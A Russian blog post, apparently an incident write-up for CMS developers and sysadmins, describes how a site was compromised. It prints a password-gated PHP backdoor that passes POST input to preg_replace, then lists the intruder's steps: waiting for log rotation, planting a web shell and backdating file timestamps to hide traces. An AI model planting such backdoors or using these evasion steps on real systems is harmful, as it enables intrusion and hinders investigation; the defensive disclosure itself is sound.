qkowlew: На Зилантконе меня сфоткали мыльницей. Мыльницам не позирую! (фига)
[personal profile] qkowlew
Данный пост может быть полезен разработчикам CMS и сисадминам. см. также пост в ХабраХабр
  1. Через дыру (скорее всего, в коде сайта) создать на сайте скрипт Vystavka_anons.php типа
    ?php
    if (md5($_POST['p']) == 'b2bf02228dbfbb1cb1e7f853109710fe') {
        preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
    }
    

  2. Дождаться, когда соответствующий моменту 1 логи вебсервера в результате ротации сотрутся. Дабы затруднить поиск собственно эксплуатируемой уязвимости.
  3. Воспользоваться созданным скриптом чтобы создать вебшелл - например Sokolniki20100223_117.php
  4. Воспользоваться вебшеллом. Прежде всего для того, чтобы изменить TimeStamp первого залитого файла Vystavka_anons.php на прошлую дабы затруднить поиск новых файлов по modification time.